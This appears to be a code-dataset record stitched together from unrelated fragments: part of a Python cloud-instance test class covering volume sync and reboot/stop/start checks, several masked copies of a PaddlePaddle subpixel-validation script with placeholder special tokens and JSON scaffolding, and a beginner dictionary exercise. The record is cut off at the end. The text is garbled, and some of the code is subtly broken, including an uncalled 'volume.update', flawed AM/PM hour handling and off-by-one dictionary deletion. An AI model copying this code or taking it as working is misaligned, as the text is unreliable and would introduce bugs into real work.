volume.attach_data.device.replace('/','-')\n for disk in self.diskdrives:\n if disk.serialnumber == serial_number:\n return disk\n return None\n\n\n\n def is_volume_attached_to_this_instance(self, volume):\n '''\n Attempts to look up volume state per cloud to confirm the cloud believe the state of this volume is attached\n to this instance. This does not verify the guest/hypervisor also belives the volume is attached.\n :param volume: volume obj.\n :returns boolean\n '''\n volume.update()\n if hasattr(volume, 'attach_data') and volume.attach_data and (volume.attach_data.instance_id == self.id):\n self.debug('Volume:' + str(volume.id) + \" is attached to this instance: \" + str(self.id) + \" per cloud perspective\")\n return True\n else:\n self.debug('Volume:' + str(volume.id) + \" is NOT attached to this instance: \" + str(self.id) + \" per cloud perspective\")\n return False\n\n\n\n def update_volume_guest_info(self, volume, md5=None, md5len=None, guestdev=None):\n self.debug(\"{0} update_volume_guest_info: {1} {2}\"\n .format(termline, volume, termline))\n if not self.is_volume_attached_to_this_instance(volume):\n raise Exception('Volume not attached to this instance')\n disk = None\n if not self.get_volume_from_attached_list_by_id(volume.id):\n self.attached_vols.append(volume)\n volume.guestdev = guestdev or volume.guestdev\n if md5:\n if not md5len:\n raise Exception('Must provide md5len if providing the md5')\n volume.md5 = md5\n volume.md5len = md5len\n else:\n disk = self.get_diskdrive_for_volume(volume)\n if not disk:\n raise Exception('Could not find diskdrive for volume when attempting to update volume guest info:' + str(volume))\n volume.md5len = md5len or 1024\n volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)\n if not guestdev:\n volume.guestdev = disk.deviceid\n disk = disk or self.get_diskdrive_for_volume(volume)\n disk.update_ebs_info()\n volume.update_volume_attach_info_tags(md5=volume.md5, md5len=volume.md5len, instance_id=self.id, guestdev=volume.guestdev)\n return volume\n\n def get_unsynced_volumes(self, check_md5=True):\n '''\n Description: Returns list of volumes which are:\n -in a state the cloud believes the vol is no longer attached\n -the attached device has changed, or is not found.\n If all euvols are shown as attached to this instance, and the last known local dev is present and/or a local device is found with matching md5 checksum\n then the list will return 'None' as all volumes are successfully attached and state is in sync.\n By default this method will iterate through all the known euvolumes attached to this euinstance.\n A subset can be provided in the list argument 'euvol_list'.\n Returns a list of euvolumes for which a corresponding guest device could not be found, or the cloud no longer believes is attached.\n\n :param euvol_list: - optional - euvolume object list. Defaults to all self.attached_vols\n :param md5length: - optional - defaults to the length given in each euvolume. Used to calc md5 checksum of devices\n :param timerpervolume: -optional - time to wait for device to appear, per volume before failing\n :param min_polls: - optional - minimum iterations to check guest devs before failing, despite timeout\n :param check_md5: - optional - find devices by md5 comparision. Default is to only perform this check when virtio_blk is in use.\n '''\n bad_list = []\n retdict = self.sync_attached_volumes_with_clouds_view()\n bad_list.extend(retdict['badvols'])\n return bad_list\n\n\n\n def reboot_instance_and_verify(self,\n waitconnect=60,\n timeout=600,\n wait_for_ports=180,\n connect=True,\n checkvolstatus=False,\n pad=5,\n uptime_retries=3):\n '''\n Attempts to reboot an instance and verify it's state post reboot.\n waitconnect-optional-integer representing seconds to wait before attempting to connect to instance after reboot\n timeout-optional-integer, seconds. If a connection has failed, this timer is used to determine a retry\n connect- optional - boolean to indicate whether an ssh session should be established once the expected state has been reached\n checkvolstatus - optional -boolean to be used to check volume status post start up\n '''\n msg=\"\"\n newuptime = None\n attempt = 0\n def get_safe_uptime():\n uptime = None\n try:\n uptime = self.get_uptime()\n except: pass\n return uptime\n self.debug('Attempting to reboot instance:'+str(self.id)+', check attached volume state first')\n uptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)\n elapsed = 0\n start = time.time()\n if checkvolstatus:\n #update the md5sums per volume before reboot\n bad_vols=self.get_unsynced_volumes()\n if bad_vols != []:\n for bv in bad_vols:\n self.debug(str(self.id)+'Unsynced volume found:'+str(bv.id))\n raise Exception(str(self.id)+\"Could not reboot using checkvolstatus flag due to unsync'd volumes\")\n self.debug('Rebooting now...')\n self.reboot()\n time.sleep(waitconnect)\n try:\n self.poll_for_ports_status(ports=[3389,5589], timeout=wait_for_ports)\n except:\n self.debug('Failed to poll winrm and rdp ports after ' + str(wait_for_ports) + ' seconds, try to connect anyways...')\n timeout=timeout - int(time.time()-start)\n while (elapsed < timeout):\n self.connect_to_instance(timeout=timeout)\n #Wait for the system to provide a valid response for uptime, early connections may not\n newuptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)\n elapsed = int(time.time()-start)\n #Check to see if new uptime is at least 'pad' less than before, allowing for some pad\n if (newuptime - (uptime+elapsed)) > pad:\n err_msg = \"Instance uptime does not represent a reboot. Orig:\"+str(uptime)+\\\n \", New:\"+str(newuptime)+\", elapsed:\"+str(elapsed)+\"/\"+str(timeout)\n if elapsed > timeout:\n raise Exception(err_msg)\n else:\n self.debug(err_msg)\n else:\n self.debug(\"Instance uptime indicates a reboot. Orig:\"+str(uptime)+\\\n \", New:\"+str(newuptime)+\", elapsed:\"+str(elapsed))\n break\n if checkvolstatus:\n badvols= self.get_unsynced_volumes()\n if badvols != []:\n for vol in badvols:\n msg = msg+\"\\nVolume:\"+vol.id+\" Local Dev:\"+vol.guestdev\n raise Exception(\"Missing volumes post reboot:\"+str(msg)+\"\\n\")\n self.debug(self.id+\" reboot_instance_and_verify Success\")\n\n\n def get_uptime(self):\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n if hasattr(self.system_info, 'system_boot_time'):\n return self._get_uptime_from_system_boot_time()\n elif hasattr(self.system_info, 'system_up_time'):\n return self._get_uptime_from_system_up_time()\n else:\n tb = self.tester.get_traceback()\n raise Exception(str(tb) + '\\nCould not get system boot or up time from system_info')\n\n def _get_uptime_from_system_boot_time(self):\n #11/18/2013, 3:15:39 PM\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n splitdate = self.system_info.system_boot_time.split()\n datestring = splitdate[0]\n timestring = splitdate[1]\n ampm = splitdate[2]\n month, day, year = datestring.replace(',',\"\").split('/')\n hours, minutes, seconds = timestring.split(':')\n if ampm == 'PM':\n hours = int(hours) + 12\n datetimestring = str(year) + \" \" + \\\n str(month) + \" \" + \\\n str(day) + \" \" + \\\n str(hours) + \" \" + \\\n str(minutes) + \" \" + \\\n str(seconds)\n dt = datetime.strptime(datetimestring, \"%Y %m %d %H %M %S\")\n return int(time.time() - time.mktime(dt.timetuple()))\n \n def _get_uptime_from_system_up_time(self):\n #0 Days, 0 Hours, 6 Minutes, 39 Seconds\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n uptime_string = self.system_info.system_up_time\n days = 0\n hours = 0\n minutes = 0\n seconds = 0\n split = uptime_string.split(',')\n for part in split:\n time_string = \"\"\n if re.search('Days', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n days = int(time_string or 0)\n elif re.search('Hours', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n hours = int(time_string or 0)\n elif re.search('Minutes', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n minutes = int(time_string or 0)\n elif re.search('Seconds', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n seconds = int(time_string or 0)\n self.debug(\"Days:\" +str(days)+', Hours:'+ str(hours) + \", Minutes:\" + str(minutes) + \", Seconds:\" + str(seconds))\n uptime = (days * 86400) + (hours * 3600) + (minutes * 60) + seconds\n return uptime\n\n\n def stop_instance_and_verify(self, timeout=200, state='stopped',\n failstate='terminated', check_vols=True):\n '''\n Attempts to stop instance and verify the state has gone to\n stopped state\n :param timeout; -optional-time to wait on instance to go to state 'state' before failing\n :param state: -optional-the expected state to signify success, default is stopped\n :param failstate: -optional-a state transition that indicates failure, default is terminated\n '''\n self.debug(self.id+\" Attempting to stop instance...\")\n start = time.time()\n elapsed = 0\n self.stop()\n while (elapsed < timeout):\n time.sleep(2)\n self.update()\n if self.state == state:\n break\n if self.state == failstate:\n raise Exception(str(self.id) + \" instance went to state:\" +\n str(self.state) + \" while stopping\")\n elapsed = int(time.time()- start)\n if elapsed % 10 == 0 :\n self.debug(str(self.id) + \" wait for stop, in state:\" +\n str(self.state) + \",time remaining:\" +\n str(elapsed) + \"/\" + str(timeout) )\n if self.state != state:\n raise Exception(self.id + \" state: \" + str(self.state) +\n \" expected:\" + str(state) +\n \", after elapsed:\" + str(elapsed))\n if check_vols:\n for volume in self.attached_vols:\n volume.update\n if volume.status != 'in-use':\n raise Exception(str(self.id) + ', Volume ' +\n str(volume.id) + ':' + str(volume.status)\n + ' state did not remain in-use '\n 'during stop')\n self.debug(self.id + \" stop_instance_and_verify Success\")\n\n\n def start_instance_and_verify(self, timeout=300, state = 'running',\n failstates=['terminated'], failfasttime=30,\n connect=True, checkvolstatus=True):\n '''\n Attempts to start instance and verify state, and reconnects ssh session\n :param timeout: -optional-time to wait on instance to go to state\n 'state' before failing\n :param state: -optional-the expected state to signify success,\n default is running\n :param failstate: -optional-a state transition that indicates failure,\n default is terminated\n :param connect: -optional - boolean to indicate whether an ssh\n session should be established once the expected state\n has been reached\n :param checkvolstatus: -optional -boolean to be used to check volume\n status post start up\n '''\n self.debug(self.id+\" Attempting to start instance...\")\n if checkvolstatus:\n for volume in self.attached_vols:\n volume.update\n if checkvolstatus:\n if volume.status != 'in-use':\n raise Exception(str(self.id) + ', Volume ' + str(volume.id) + ':' + str(volume.status)\n + ' state did not remain in-use during stop' )\n self.debug(\"\\n\"+ str(self.id) + \": Printing Instance 'attached_vol' list:\\n\")\n self.tester.show_volumes(self.attached_vols)\n msg=\"\"\n start = time.time()\n elapsed = 0\n self.update()\n #Add fail fast states...\n if self.state == 'stopped':\n failstates.extend(['stopped','stopping'])\n self.start()\n\n while (elapsed < timeout):\n elapsed = int(time.time()- start)\n self.update()\n self.debug(str(self.id) + \" wait for start, in state:\" +\n str(self.state) + \",time remaining:\" + str(elapsed) +\n \"/\"+str(timeout) )\n if self.state == state:\n break\n if elapsed >= failfasttime:\n for failstate in failstates:\n if self.state == failstate:\n raise Exception(str(self.id) +\n \" instance went to state:\" +\n str(self.state) + \" while starting\")\n time.sleep(10)\n if self.state != state:\n raise Exception(self.id + \" not in \" + str(state) +\n \" state after elapsed:\" + str(elapsed))\n else:\n self.debug(self.id + \" went to state:\" + str(state))\n if connect:\n self.connect_to_instance(timeout=timeout)\n if checkvolstatus:\n badvols= self.get_unsynced_volumes(check_md5=True)\n if badvols != []:\n for vol in badvols:\n msg = msg + \"\\nVolume:\" + vol.id + \" Local Dev:\" +\\\n vol.guestdev\n raise Exception(\"Missing volumes post reboot:\" + str(msg) +\n \"\\n\")\n self.debug(self.id+\" start_instance_and_verify Success\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
@paddle.no_grad()
class Val_model_subpixel(object):
<|reserved_special_token_0|>
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).
requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points,
dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
from tqdm import tqdm
import logging
from pathlib import Path
import paddle
import paddle.optimizer
import paddle.io
from utils.loader import dataLoader
from utils.loader import modelLoader
from utils.loader import pretrainedLoader
from utils.tools import dict_update
from utils.utils import labels2Dto3D
from utils.utils import flattenDetection
from utils.utils import labels2Dto3D_flattened
from utils.utils import pltImshow
from utils.utils import saveImg
from utils.utils import precisionRecall_torch
from utils.utils import save_checkpoint
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).
requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points,
dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
<|reserved_special_token_1|>
"""script for subpixel experiment (not tested)
"""
import numpy as np
from tqdm import tqdm
import logging
from pathlib import Path
import paddle
import paddle.optimizer
import paddle.io
from utils.loader import dataLoader
from utils.loader import modelLoader
from utils.loader import pretrainedLoader
from utils.tools import dict_update
from utils.utils import labels2Dto3D
from utils.utils import flattenDetection
from utils.utils import labels2Dto3D_flattened
from utils.utils import pltImshow
from utils.utils import saveImg
from utils.utils import precisionRecall_torch
from utils.utils import save_checkpoint
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s',
self.weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device),
img.to(self.device),
patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points, dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
|
flexible
|
{
"blob_id": "fc89fdf17f887ea398be5b36d4d6f0444d64b3e0",
"index": 8026,
"step-1": "<mask token>\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n <mask token>\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\nif __name__ == '__main__':\n filename = 'configs/magicpoint_repeatability.yaml'\n import yaml\n device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'\n device = device.replace('cuda', 'gpu')\n device = paddle.set_device(device)\n paddle.set_default_dtype('float32')\n with open(filename, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n task = config['data']['dataset']\n from utils.loader import dataLoader_test as dataLoader\n data = dataLoader(config, dataset='hpatches')\n test_set, test_loader = data['test_set'], data['test_loader']\n for i, sample in tqdm(enumerate(test_loader)):\n if i > 1:\n break\n val_agent = Val_model_subpixel(config['subpixel'], device=device)\n val_agent.loadModel()\n img = sample['image']\n print('image: ', img.shape)\n points = paddle.to_tensor([[1, 2], [3, 4]])\n\n def points_to_4d(points):\n num_of_points = points.shape[0]\n cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).\n requires_grad_(False), dtype=paddle.float32)\n points = paddle.concat((cols, cols, paddle.to_tensor(points,\n dtype=paddle.float32)), axis=1)\n return points\n label_idx = points_to_4d(points)\n patches = val_agent.extract_patches(label_idx, img)\n points_res = val_agent.run(patches)\n",
"step-4": "<mask token>\nimport numpy as np\nfrom tqdm import tqdm\nimport logging\nfrom pathlib import Path\nimport paddle\nimport paddle.optimizer\nimport paddle.io\nfrom utils.loader import dataLoader\nfrom utils.loader import modelLoader\nfrom utils.loader import pretrainedLoader\nfrom utils.tools import dict_update\nfrom utils.utils import labels2Dto3D\nfrom utils.utils import flattenDetection\nfrom utils.utils import labels2Dto3D_flattened\nfrom utils.utils import pltImshow\nfrom utils.utils import saveImg\nfrom utils.utils import precisionRecall_torch\nfrom utils.utils import save_checkpoint\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\nif __name__ == '__main__':\n filename = 'configs/magicpoint_repeatability.yaml'\n import yaml\n device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'\n device = device.replace('cuda', 'gpu')\n device = paddle.set_device(device)\n paddle.set_default_dtype('float32')\n with open(filename, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n task = config['data']['dataset']\n from utils.loader import dataLoader_test as dataLoader\n data = dataLoader(config, dataset='hpatches')\n test_set, test_loader = data['test_set'], data['test_loader']\n for i, sample in tqdm(enumerate(test_loader)):\n if i > 1:\n break\n val_agent = Val_model_subpixel(config['subpixel'], device=device)\n val_agent.loadModel()\n img = sample['image']\n print('image: ', img.shape)\n points = paddle.to_tensor([[1, 2], [3, 4]])\n\n def points_to_4d(points):\n num_of_points = points.shape[0]\n cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).\n requires_grad_(False), dtype=paddle.float32)\n points = paddle.concat((cols, cols, paddle.to_tensor(points,\n dtype=paddle.float32)), axis=1)\n return points\n label_idx = points_to_4d(points)\n patches = val_agent.extract_patches(label_idx, img)\n points_res = val_agent.run(patches)\n",
"step-5": "\"\"\"script for subpixel experiment (not tested)\n\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\nimport logging\nfrom pathlib import Path\n\nimport paddle\nimport paddle.optimizer\nimport paddle.io\n\nfrom utils.loader import dataLoader\nfrom utils.loader import modelLoader\nfrom utils.loader import pretrainedLoader\nfrom utils.tools import dict_update\nfrom utils.utils import labels2Dto3D\nfrom utils.utils import flattenDetection\nfrom utils.utils import labels2Dto3D_flattened\nfrom utils.utils import pltImshow\nfrom utils.utils import saveImg\nfrom utils.utils import precisionRecall_torch\nfrom utils.utils import save_checkpoint\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s',\n self.weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device),\n img.to(self.device),\n patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\nif __name__ == '__main__':\n filename = 'configs/magicpoint_repeatability.yaml'\n import yaml\n\n device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'\n device = device.replace('cuda', 'gpu')\n device = paddle.set_device(device)\n\n paddle.set_default_dtype('float32')\n\n with open(filename, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n task = config['data']['dataset']\n\n from utils.loader import dataLoader_test as dataLoader\n\n data = dataLoader(config, dataset='hpatches')\n test_set, test_loader = data['test_set'], data['test_loader']\n for i, sample in tqdm(enumerate(test_loader)):\n if i > 1:\n break\n\n val_agent = Val_model_subpixel(config['subpixel'], device=device)\n val_agent.loadModel()\n\n img = sample['image']\n print('image: ', img.shape)\n points = paddle.to_tensor([[1, 2], [3, 4]])\n\n def points_to_4d(points):\n num_of_points = points.shape[0]\n cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).requires_grad_(False), dtype=paddle.float32)\n points = paddle.concat((cols, cols, paddle.to_tensor(points, dtype=paddle.float32)), axis=1)\n return points\n label_idx = points_to_4d(points)\n\n patches = val_agent.extract_patches(label_idx, img)\n points_res = val_agent.run(patches)\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
# lesson 4 Mateush Vilen
my_information = {
'name': 'Vilen',
'last_name': 'Mateush',
'how_old': 31,
'born_town': 'Khmelniysky'
}
dict_test = {key: key**2 for key in range(7)}
print('dict_test: ', dict_test)
elem_dict = 0
elem_dict = input('input number of elements:')
user_input_dict = {}
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
del_key = 0
del_key = input('input key for remove:')
dict_test.pop(int(del_key))
print(dict_test)
list_test = [elem for elem in range(5)]
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
# ------------My database------------:
work = True
user_dict = {}
user_numb = 0
while work == True:
print('Your personal database is work, you have this base:')
print(user_dict)
print('if you want add record press 1')
print('if you wand delete record press 2')
print('if you wand change record press 3')
print('if you want exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
print('what number of record you want to delete?')
del_key = input()
if del_key.isdigit() == False:
print('This is not correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
print('Your base doesnot have this number!')
continue
user_dict.pop(int(del_key)+1)
elif int(user_numb) == 3:
print('What number of record you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
print('This is not number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
print('Your base doesnt have this number!')
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key)-1] = value
elif int(user_numb) == 4:
work = False
else:
print('your input false, please write true number!')
|
normal
|
{
"blob_id": "b000f293b50970233d5b71abc3e10e2ad57a3fc7",
"index": 1767,
"step-1": "<mask token>\n",
